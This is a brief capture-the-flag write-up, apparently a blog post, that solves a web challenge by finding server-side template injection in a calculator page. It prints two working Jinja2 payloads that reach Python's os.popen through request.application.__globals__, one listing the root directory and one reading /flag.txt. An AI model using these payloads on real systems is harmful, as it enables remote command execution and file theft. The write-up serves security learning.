I just created my first website! You can even do some calculations! Don’t forget to check out my other projects! author: Chr0x6eOs

We open the website and there is nothing interesting and so we try to check out the other projects

img-description

We are brought to this page and immediately what pops in my brain is SSTI

img-description

I try injecting something to see the changes and indeed the website has an SSTI

img-description

Next let’s check what’s in the / directory and we see the file flag.txt using the following payload

{% raw %}{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cd / && ls')['read']()}}{% endraw %}

img-description

Next we create a payload to read the flag.txt file

{% raw %}{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cat /flag.txt')['read']()}}{% endraw %}

img-description